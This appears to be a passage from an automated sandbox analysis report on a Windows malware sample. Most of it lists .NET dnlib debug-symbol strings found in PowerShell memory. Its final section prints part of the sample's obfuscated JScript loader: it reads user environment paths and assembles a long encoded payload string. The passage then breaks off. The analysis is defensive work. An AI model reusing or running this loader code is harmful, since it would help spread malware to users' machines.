                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell"); var topologia = shell.ExpandEnvironmentStrings("%APPDATA%"); var ripiglossa = shell.ExpandEnvironmentStrings("%USERPROFILE%"); var SysTemp = shell.ExpandEnvironmentStrings("%TEMP%"); var irrefutado = shell.ExpandEnvironmentStrings("%WINDIR%"); var jambatuto = shell.ExpandEnvironmentStrings("%USERNAME%"); var teorizar = "C:\\path\\to\\your\\teorizar"; // Define the working directory var linfotomia = "C:\\path\\to\\your\\linfotomia"; // Define the temporary directory var magricela = "C:\\path\\to\\your\\minidump"; // Define the minidump directory // Function to wrap a string in quotes function garranchoso(strin) { return '"' + strin + '"'; } // Function to check whether a string needs quotes function Needgarranchoso(strin) { return strin.indexOf(' ') !== -1; } // Function to format the arguments function FormatArguments() { var args = WScript.Arguments; var s = ""; for (var i = 0; i < args.length; i++) { var arg = args(i); if (Needgarranchoso(arg)) { s += " " + garranchoso(arg); } else { s += " " + arg; } } return s; } var podartro = "? ? ? ? ?"; var marrasquino = "=AQKAcCAnAgbAkGAPBgSA0CAnAAWAcCArAQXAMDAsAQMAsFApAQZ? ? ? ? ?AMGAOBQRAIHAlBgRAUGAyBAcAUGATBwbAIEASB? ? ? ? ?QZAYFAkAQXAcEAuBQaAIFAUB? ? ? ? ?wcAsFAoAAIAgCAuAAfAkCAyAQOA0FASBQYAgGADBwWAwCApAQMAIDAxAQXAIFAhBAaAMEAbBwKAIDA1AQXAIFAhBAaAMEAbBwKAQDA4AQXAIFAhBAaAMEAbBAKAACAgAQZAMGABBAbAAFAlBgUA0CAgAAIAYDAzAQXAIFAhBAaAMEAbBALAkCA2AQNA0FASBQYAgGADBwWA? ? ? ? ?sCA4AANA0FASBQYAgGADBwWAsCA2AgNA0FASBQYAgGADBwWAgCAgAAIAUGAjBQQAwGAQBQZA? ? ? ? ?IFAtAAIAACA5AwMA0"; marrasquino += "FASBQYAgGADBwWAwCApAwMAcDAdBgUAEGAoBwQAsFArAQNAUDAdB? ? ? ? ?gUAEGAoBwQAsFArAwNAYDAdBgUAEGAoBwQAsFA? ? ? ? ?oAAIAACAlBwQAEGAMBAcAUGA? ? ? ? ?yBwQA0CAgAAIAQDAzAQXAIFAhBAaAMEAbBALAkCA1AAOA0FASBQYAgGADBwWAsCAxAAOA0FASBQYAgGADBwWAsCAyAQMAEDAdBgUAEGAoBwQAsFAoAAIAUGADBQYAwEAwBQZAIHADBQLAACAgAQKAcCApAQVAEFAnAwKAcCAwBwJAsCAnAQVAEFAnAwKAcCAwBALAUFARBA? ? ? ? ?cAUFAnAwKAcCARBAcAACAsAQVAEFAwBwJAsCAnAgMAcCArAwJAMDAzBwcAUGAjBwbAcCArAw? ? ? ? ?JAIHAQBgbAkEAkBAZ"; marrasquino += "AEEAVBQUAAHAgAALAUFARBwJAsCAnAAcAEGAmBwJAsCAnAQaAQHA? ? ? ? ?hBwYAwGAnAwKAcCAhBQVAEFAnAwKAcCAwBAIAw? ? ? ? ?CAVBQUAAHAnAwKAcCA5BwJAs? ? ? ? ?CAnAANAQFAnAwKAcCAhBAdAEGAEBQbAEGAyBwZA8GAyBAUAkHA0AwJAsCAnAAVAoDADBQVAEFAwBAIAcCArAwJAwCAVBQUAAHAxAQVAEFAwBAIAcCArAwJAwCAVBQUAAHAoBAdAcCArAwJAQHAwBwJAsCAnAwcAcCArAwJAoDAvAwLAcCArAwJAYGApBgcAUGAnAwKAcCAi? ? ? ? ?BQYAMHAlBwcAcCArAwJAQHAnAwKAcCAvBgcAEGAnBwJAsCAnAQZA4CAnAwKAcCAnBwbA8GAn? ? ? ? ?AwKAcCAnBAbAUGAhB"; marrasquino += "AcAkGAzBwJAsCAnAgLAcCArAwJAMGAvBQbA8CAnAwKAcCA2BAMA8? ? ? ? ?CAiBwLAcCArAwJAMGAnAwKAcCAyBQeAAHA0BwJ? ? ? ? ?AsCAnAwcAIDAwAgMAQDAuAQY?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = '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
